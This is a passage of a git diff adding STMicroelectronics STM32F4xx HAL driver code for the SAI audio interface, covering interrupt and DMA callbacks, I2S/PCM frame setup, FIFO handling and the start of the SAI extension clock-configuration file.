/* Set the DMA Rx abort callback */ + hsai->hdmarx->XferAbortCallback = SAI_DMAAbort; + + /* Abort DMA in IT mode */ + HAL_DMA_Abort_IT(hsai->hdmarx); + } + } + else + { + /* If WCKCFG occurs, SAI audio block is automatically disabled */ + /* Disable all interrupts and clear all flags */ + hsai->Instance->IMR = 0U; + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + /* Set the SAI state to ready to be able to start again the process */ + hsai->State = HAL_SAI_STATE_READY; + + /* Initialize XferCount */ + hsai->XferCount = 0U; + + /* SAI error Callback */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + } + /* SAI CNRDY interrupt occurred ----------------------------------*/ + else if (((itflags & SAI_FLAG_CNRDY) == SAI_FLAG_CNRDY) && ((itsources & SAI_IT_CNRDY) == SAI_IT_CNRDY)) + { + /* Clear the SAI CNRDY flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_CNRDY); + + /* Change the SAI error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_CNREADY; + + /* the transfer is not stopped, we will forward the information to the user and we let the user decide what needs to be done */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + else + { + /* Nothing to do */ + } + } +} + +/** + * @brief Tx Transfer completed callback. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_TxCpltCallback(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Transfer Half completed callback. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_TxHalfCpltCallback(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_TxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callback. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_RxCpltCallback(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer half completed callback. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_RxHalfCpltCallback(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_RxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief SAI error callback. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +__weak void HAL_SAI_ErrorCallback(SAI_HandleTypeDef *hsai) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsai); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SAI_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup SAI_Exported_Functions_Group3 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the SAI handle state. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval HAL state + */ +HAL_SAI_StateTypeDef HAL_SAI_GetState(SAI_HandleTypeDef *hsai) +{ + return hsai->State; +} + +/** + * @brief Return the SAI error code. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for the specified SAI Block. + * @retval SAI Error Code + */ +uint32_t HAL_SAI_GetError(SAI_HandleTypeDef *hsai) +{ + return hsai->ErrorCode; +} +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup SAI_Private_Functions + * @brief Private functions + * @{ + */ + +/** + * @brief Initialize the SAI I2S protocol according to the specified parameters + * in the SAI_InitTypeDef and create the associated handle. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param protocol one of the supported protocol. + * @param datasize one of the supported datasize @ref SAI_Protocol_DataSize + * the configuration information for SAI module. + * @param nbslot number of slot minimum value is 2 and max is 16. + * the value must be a multiple of 2. + * @retval HAL status + */ +static HAL_StatusTypeDef SAI_InitI2S(SAI_HandleTypeDef *hsai, uint32_t protocol, uint32_t datasize, uint32_t nbslot) +{ + hsai->Init.Protocol = SAI_FREE_PROTOCOL; + hsai->Init.FirstBit = SAI_FIRSTBIT_MSB; + /* Compute ClockStrobing according AudioMode */ + if ((hsai->Init.AudioMode == SAI_MODEMASTER_TX) || (hsai->Init.AudioMode == SAI_MODESLAVE_TX)) + { + /* Transmit */ + hsai->Init.ClockStrobing = SAI_CLOCKSTROBING_FALLINGEDGE; + } + else + { + /* Receive */ + hsai->Init.ClockStrobing = SAI_CLOCKSTROBING_RISINGEDGE; + } + hsai->FrameInit.FSDefinition = SAI_FS_CHANNEL_IDENTIFICATION; + hsai->SlotInit.SlotActive = SAI_SLOTACTIVE_ALL; + hsai->SlotInit.FirstBitOffset = 0U; + hsai->SlotInit.SlotNumber = nbslot; + + /* in IS2 the number of slot must be even */ + if ((nbslot & 0x1U) != 0U) + { + return HAL_ERROR; + } + + if (protocol == SAI_I2S_STANDARD) + { + hsai->FrameInit.FSPolarity = SAI_FS_ACTIVE_LOW; + hsai->FrameInit.FSOffset = SAI_FS_BEFOREFIRSTBIT; + } + else + { + /* SAI_I2S_MSBJUSTIFIED or SAI_I2S_LSBJUSTIFIED */ + hsai->FrameInit.FSPolarity = SAI_FS_ACTIVE_HIGH; + hsai->FrameInit.FSOffset = SAI_FS_FIRSTBIT; + } + + /* Frame definition */ + switch (datasize) + { + case SAI_PROTOCOL_DATASIZE_16BIT: + hsai->Init.DataSize = SAI_DATASIZE_16; + hsai->FrameInit.FrameLength = 32U * (nbslot / 2U); + hsai->FrameInit.ActiveFrameLength = 16U * (nbslot / 2U); + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_16B; + break; + case SAI_PROTOCOL_DATASIZE_16BITEXTENDED : + hsai->Init.DataSize = SAI_DATASIZE_16; + hsai->FrameInit.FrameLength = 64U * (nbslot / 2U); + hsai->FrameInit.ActiveFrameLength = 32U * (nbslot / 2U); + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + case SAI_PROTOCOL_DATASIZE_24BIT: + hsai->Init.DataSize = SAI_DATASIZE_24; + hsai->FrameInit.FrameLength = 64U * (nbslot / 2U); + hsai->FrameInit.ActiveFrameLength = 32U * (nbslot / 2U); + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + case SAI_PROTOCOL_DATASIZE_32BIT: + hsai->Init.DataSize = SAI_DATASIZE_32; + hsai->FrameInit.FrameLength = 64U * (nbslot / 2U); + hsai->FrameInit.ActiveFrameLength = 32U * (nbslot / 2U); + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + default : + return HAL_ERROR; + } + if (protocol == SAI_I2S_LSBJUSTIFIED) + { + if (datasize == SAI_PROTOCOL_DATASIZE_16BITEXTENDED) + { + hsai->SlotInit.FirstBitOffset = 16U; + } + if (datasize == SAI_PROTOCOL_DATASIZE_24BIT) + { + hsai->SlotInit.FirstBitOffset = 8U; + } + } + return HAL_OK; +} + +/** + * @brief Initialize the SAI PCM protocol according to the specified parameters + * in the SAI_InitTypeDef and create the associated handle. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param protocol one of the supported protocol + * @param datasize one of the supported datasize @ref SAI_Protocol_DataSize + * @param nbslot number of slot minimum value is 1 and the max is 16. + * @retval HAL status + */ +static HAL_StatusTypeDef SAI_InitPCM(SAI_HandleTypeDef *hsai, uint32_t protocol, uint32_t datasize, uint32_t nbslot) +{ + hsai->Init.Protocol = SAI_FREE_PROTOCOL; + hsai->Init.FirstBit = SAI_FIRSTBIT_MSB; + /* Compute ClockStrobing according AudioMode */ + if ((hsai->Init.AudioMode == SAI_MODEMASTER_TX) || (hsai->Init.AudioMode == SAI_MODESLAVE_TX)) + { + /* Transmit */ + hsai->Init.ClockStrobing = SAI_CLOCKSTROBING_RISINGEDGE; + } + else + { + /* Receive */ + hsai->Init.ClockStrobing = SAI_CLOCKSTROBING_FALLINGEDGE; + } + hsai->FrameInit.FSDefinition = SAI_FS_STARTFRAME; + hsai->FrameInit.FSPolarity = SAI_FS_ACTIVE_HIGH; + hsai->FrameInit.FSOffset = SAI_FS_BEFOREFIRSTBIT; + hsai->SlotInit.FirstBitOffset = 0U; + hsai->SlotInit.SlotNumber = nbslot; + hsai->SlotInit.SlotActive = SAI_SLOTACTIVE_ALL; + + if (protocol == SAI_PCM_SHORT) + { + hsai->FrameInit.ActiveFrameLength = 1; + } + else + { + /* SAI_PCM_LONG */ + hsai->FrameInit.ActiveFrameLength = 13; + } + + switch (datasize) + { + case SAI_PROTOCOL_DATASIZE_16BIT: + hsai->Init.DataSize = SAI_DATASIZE_16; + hsai->FrameInit.FrameLength = 16U * nbslot; + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_16B; + break; + case SAI_PROTOCOL_DATASIZE_16BITEXTENDED : + hsai->Init.DataSize = SAI_DATASIZE_16; + hsai->FrameInit.FrameLength = 32U * nbslot; + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + case SAI_PROTOCOL_DATASIZE_24BIT : + hsai->Init.DataSize = SAI_DATASIZE_24; + hsai->FrameInit.FrameLength = 32U * nbslot; + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + case SAI_PROTOCOL_DATASIZE_32BIT: + hsai->Init.DataSize = SAI_DATASIZE_32; + hsai->FrameInit.FrameLength = 32U * nbslot; + hsai->SlotInit.SlotSize = SAI_SLOTSIZE_32B; + break; + default : + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Fill the fifo. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_FillFifo(SAI_HandleTypeDef *hsai) +{ + /* fill the fifo with data before to enabled the SAI */ + while (((hsai->Instance->SR & SAI_xSR_FLVL) != SAI_FIFOSTATUS_FULL) && (hsai->XferCount > 0U)) + { + if ((hsai->Init.DataSize == SAI_DATASIZE_8) && (hsai->Init.CompandingMode == SAI_NOCOMPANDING)) + { + hsai->Instance->DR = (*hsai->pBuffPtr++); + } + else if (hsai->Init.DataSize <= SAI_DATASIZE_16) + { + hsai->Instance->DR = *((uint32_t *)hsai->pBuffPtr); + hsai->pBuffPtr += 2U; + } + else + { + hsai->Instance->DR = *((uint32_t *)hsai->pBuffPtr); + hsai->pBuffPtr += 4U; + } + hsai->XferCount--; + } +} + +/** + * @brief Return the interrupt flag to set according the SAI setup. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @param mode SAI_MODE_DMA or SAI_MODE_IT + * @retval the list of the IT flag to enable + */ +static uint32_t SAI_InterruptFlag(SAI_HandleTypeDef *hsai, uint32_t mode) +{ + uint32_t tmpIT = SAI_IT_OVRUDR; + + if (mode == SAI_MODE_IT) + { + tmpIT |= SAI_IT_FREQ; + } + + if ((hsai->Init.Protocol == SAI_AC97_PROTOCOL) && + ((hsai->Init.AudioMode == SAI_MODESLAVE_RX) || (hsai->Init.AudioMode == SAI_MODEMASTER_RX))) + { + tmpIT |= SAI_IT_CNRDY; + } + + if ((hsai->Init.AudioMode == SAI_MODESLAVE_RX) || (hsai->Init.AudioMode == SAI_MODESLAVE_TX)) + { + tmpIT |= SAI_IT_AFSDET | SAI_IT_LFSDET; + } + else + { + /* hsai has been configured in master mode */ + tmpIT |= SAI_IT_WCKCFG; + } + return tmpIT; +} + +/** + * @brief Disable the SAI and wait for the disabling. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static HAL_StatusTypeDef SAI_Disable(SAI_HandleTypeDef *hsai) +{ + uint32_t count = SAI_DEFAULT_TIMEOUT * (SystemCoreClock / 7U / 1000U); + HAL_StatusTypeDef status = HAL_OK; + + /* Disable the SAI instance */ + __HAL_SAI_DISABLE(hsai); + + do + { + /* Check for the Timeout */ + if (count-- == 0U) + { + /* Update error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_TIMEOUT; + status = HAL_TIMEOUT; + break; + } + } + while ((hsai->Instance->CR1 & SAI_xCR1_SAIEN) != RESET); + + return status; +} + +/** + * @brief Tx Handler for Transmit in Interrupt mode 8-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Transmit_IT8Bit(SAI_HandleTypeDef *hsai) +{ + if (hsai->XferCount == 0U) + { + /* Handle the end of the transmission */ + /* Disable FREQ and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->TxCpltCallback(hsai); +#else + HAL_SAI_TxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + else + { + /* Write data on DR register */ + hsai->Instance->DR = (*hsai->pBuffPtr++); + hsai->XferCount--; + } +} + +/** + * @brief Tx Handler for Transmit in Interrupt mode for 16-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Transmit_IT16Bit(SAI_HandleTypeDef *hsai) +{ + if (hsai->XferCount == 0U) + { + /* Handle the end of the transmission */ + /* Disable FREQ and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->TxCpltCallback(hsai); +#else + HAL_SAI_TxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + else + { + /* Write data on DR register */ + hsai->Instance->DR = *(uint16_t *)hsai->pBuffPtr; + hsai->pBuffPtr += 2U; + hsai->XferCount--; + } +} + +/** + * @brief Tx Handler for Transmit in Interrupt mode for 32-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Transmit_IT32Bit(SAI_HandleTypeDef *hsai) +{ + if (hsai->XferCount == 0U) + { + /* Handle the end of the transmission */ + /* Disable FREQ and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->TxCpltCallback(hsai); +#else + HAL_SAI_TxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } + else + { + /* Write data on DR register */ + hsai->Instance->DR = *(uint32_t *)hsai->pBuffPtr; + hsai->pBuffPtr += 4U; + hsai->XferCount--; + } +} + +/** + * @brief Rx Handler for Receive in Interrupt mode 8-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Receive_IT8Bit(SAI_HandleTypeDef *hsai) +{ + /* Receive data */ + (*hsai->pBuffPtr++) = hsai->Instance->DR; + hsai->XferCount--; + + /* Check end of the transfer */ + if (hsai->XferCount == 0U) + { + /* Disable TXE and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + + /* Clear the SAI Overrun flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_OVRUDR); + + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->RxCpltCallback(hsai); +#else + HAL_SAI_RxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Rx Handler for Receive in Interrupt mode for 16-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Receive_IT16Bit(SAI_HandleTypeDef *hsai) +{ + /* Receive data */ + *(uint16_t *)hsai->pBuffPtr = hsai->Instance->DR; + hsai->pBuffPtr += 2U; + hsai->XferCount--; + + /* Check end of the transfer */ + if (hsai->XferCount == 0U) + { + /* Disable TXE and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + + /* Clear the SAI Overrun flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_OVRUDR); + + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->RxCpltCallback(hsai); +#else + HAL_SAI_RxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } +} + +/** + * @brief Rx Handler for Receive in Interrupt mode for 32-Bit transfer. + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval None + */ +static void SAI_Receive_IT32Bit(SAI_HandleTypeDef *hsai) +{ + /* Receive data */ + *(uint32_t *)hsai->pBuffPtr = hsai->Instance->DR; + hsai->pBuffPtr += 4U; + hsai->XferCount--; + + /* Check end of the transfer */ + if (hsai->XferCount == 0U) + { + /* Disable TXE and OVRUDR interrupts */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_IT)); + + /* Clear the SAI Overrun flag */ + __HAL_SAI_CLEAR_FLAG(hsai, SAI_FLAG_OVRUDR); + + hsai->State = HAL_SAI_STATE_READY; +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->RxCpltCallback(hsai); +#else + HAL_SAI_RxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ + } +} + +/** + * @brief DMA SAI transmit process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMATxCplt(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma->Init.Mode != DMA_CIRCULAR) + { + hsai->XferCount = 0U; + + /* Disable SAI Tx DMA Request */ + hsai->Instance->CR1 &= (uint32_t)(~SAI_xCR1_DMAEN); + + /* Stop the interrupts error handling */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_DMA)); + + hsai->State = HAL_SAI_STATE_READY; + } +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->TxCpltCallback(hsai); +#else + HAL_SAI_TxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SAI transmit process half complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMATxHalfCplt(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->TxHalfCpltCallback(hsai); +#else + HAL_SAI_TxHalfCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SAI receive process complete callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMARxCplt(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma->Init.Mode != DMA_CIRCULAR) + { + /* Disable Rx DMA Request */ + hsai->Instance->CR1 &= (uint32_t)(~SAI_xCR1_DMAEN); + hsai->XferCount = 0U; + + /* Stop the interrupts error handling */ + __HAL_SAI_DISABLE_IT(hsai, SAI_InterruptFlag(hsai, SAI_MODE_DMA)); + + hsai->State = HAL_SAI_STATE_READY; + } +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->RxCpltCallback(hsai); +#else + HAL_SAI_RxCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SAI receive process half complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->RxHalfCpltCallback(hsai); +#else + HAL_SAI_RxHalfCpltCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SAI communication error callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMAError(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Set SAI error code */ + hsai->ErrorCode |= HAL_SAI_ERROR_DMA; + + if ((hsai->hdmatx->ErrorCode == HAL_DMA_ERROR_TE) || (hsai->hdmarx->ErrorCode == HAL_DMA_ERROR_TE)) + { + /* Disable the SAI DMA request */ + hsai->Instance->CR1 &= ~SAI_xCR1_DMAEN; + + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Set the SAI state ready to be able to start again the process */ + hsai->State = HAL_SAI_STATE_READY; + + /* Initialize XferCount */ + hsai->XferCount = 0U; + } + /* SAI error Callback */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA SAI Abort callback. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void SAI_DMAAbort(DMA_HandleTypeDef *hdma) +{ + SAI_HandleTypeDef *hsai = (SAI_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Disable DMA request */ + hsai->Instance->CR1 &= ~SAI_xCR1_DMAEN; + + /* Disable all interrupts and clear all flags */ + hsai->Instance->IMR = 0U; + hsai->Instance->CLRFR = 0xFFFFFFFFU; + + if (hsai->ErrorCode != HAL_SAI_ERROR_WCKCFG) + { + /* Disable SAI peripheral */ + SAI_Disable(hsai); + + /* Flush the fifo */ + SET_BIT(hsai->Instance->CR2, SAI_xCR2_FFLUSH); + } + /* Set the SAI state to ready to be able to start again the process */ + hsai->State = HAL_SAI_STATE_READY; + + /* Initialize XferCount */ + hsai->XferCount = 0U; + + /* SAI error Callback */ +#if (USE_HAL_SAI_REGISTER_CALLBACKS == 1) + hsai->ErrorCallback(hsai); +#else + HAL_SAI_ErrorCallback(hsai); +#endif /* USE_HAL_SAI_REGISTER_CALLBACKS */ +} + +/** + * @} + */ + +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx || STM32F413xx || STM32F423xx */ +#endif /* HAL_SAI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai_ex.c new file mode 100644 index 000000000..120a27774 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sai_ex.c @@ -0,0 +1,311 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_sai_ex.c + * @author MCD Application Team + * @brief SAI Extension HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of SAI extension peripheral: + * + Extension features functions + * + @verbatim + ============================================================================== + ##### SAI peripheral extension features ##### + ============================================================================== + + [..] Comparing to other previous devices, the SAI interface for STM32F446xx + devices contains the following additional features : + + (+) Possibility to be clocked from PLLR + + ##### How to use this driver ##### + ============================================================================== + [..] This driver provides functions to manage several sources to clock SAI + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SAIEx SAIEx + * @brief SAI Extension HAL module driver + * @{ + */ + +#ifdef HAL_SAI_MODULE_ENABLED + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || \ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F413xx) || \ + defined(STM32F423xx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* SAI registers Masks */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup SAI_Private_Functions SAI Private Functions + * @{ + */ +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SAIEx_Exported_Functions SAI Extended Exported Functions + * @{ + */ + +/** @defgroup SAIEx_Exported_Functions_Group1 Extension features functions + * @brief Extension features functions + * +@verbatim + =============================================================================== + ##### Extension features Functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the possible + SAI clock sources. + +@endverbatim + * @{ + */ + +/** + * @brief Configure SAI Block synchronization mode + * @param hsai pointer to a SAI_HandleTypeDef structure that contains + * the configuration information for SAI module. + * @retval SAI Clock Input + */ +void SAI_BlockSynchroConfig(SAI_HandleTypeDef *hsai) +{ + uint32_t tmpregisterGCR; + +#if defined(STM32F446xx) + /* This setting must be done with both audio block (A & B) disabled */ + switch (hsai->Init.SynchroExt) + { + case SAI_SYNCEXT_DISABLE : + tmpregisterGCR = 0U; + break; + case SAI_SYNCEXT_OUTBLOCKA_ENABLE : + tmpregisterGCR = SAI_GCR_SYNCOUT_0; + break; + case SAI_SYNCEXT_OUTBLOCKB_ENABLE : + tmpregisterGCR = SAI_GCR_SYNCOUT_1; + break; + default: + tmpregisterGCR = 0U; + break; + } + + if ((hsai->Init.Synchro) == SAI_SYNCHRONOUS_EXT_SAI2) + { + tmpregisterGCR |= SAI_GCR_SYNCIN_0; + } + + if ((hsai->Instance == SAI1_Block_A) || (hsai->Instance == SAI1_Block_B)) + { + SAI1->GCR = tmpregisterGCR; + } + else + { + SAI2->GCR = tmpregisterGCR; + } +#endif /* STM32F446xx */ +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || \ + defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F413xx) || defined(STM32F423xx) + /* This setting must be done with both audio block (A & B) disabled */ + switch (hsai->Init.SynchroExt) + { + case SAI_SYNCEXT_DISABLE : + tmpregisterGCR = 0U; + break; + case SAI_SYNCEXT_OUTBLOCKA_ENABLE : + tmpregisterGCR = SAI_GCR_SYNCOUT_0; + break; + case SAI_SYNCEXT_OUTBLOCKB_ENABLE : + tmpregisterGCR = SAI_GCR_SYNCOUT_1; + break; + default: + tmpregisterGCR = 0U; + break; + } + SAI1->GCR = tmpregisterGCR; +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx || STM32F413xx || STM32F423xx */ +} +/** +* @brief Get SAI Input Clock based on SAI source clock selection +* @param hsai pointer to a SAI_HandleTypeDef structure that contains +* the configuration information for SAI module. +* @retval SAI Clock Input +*/ +uint32_t SAI_GetInputClock(SAI_HandleTypeDef *hsai) +{ + /* This variable used to store the SAI_CK_x (value in Hz) */ + uint32_t saiclocksource = 0U; + +#if defined(STM32F446xx) + if ((hsai->Instance == SAI1_Block_A) || (hsai->Instance == SAI1_Block_B)) + { + saiclocksource = HAL_RCCEx_GetPeriphCLKFreq(RCC_PERIPHCLK_SAI1); + } + else /* SAI2_Block_A || SAI2_Block_B*/ + { + saiclocksource = HAL_RCCEx_GetPeriphCLKFreq(RCC_PERIPHCLK_SAI2); + } +#endif /* STM32F446xx */ +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || \ + defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F413xx) || defined(STM32F423xx) + uint32_t vcoinput = 0U, tmpreg = 0U; + + /* Check the SAI Block parameters */ + 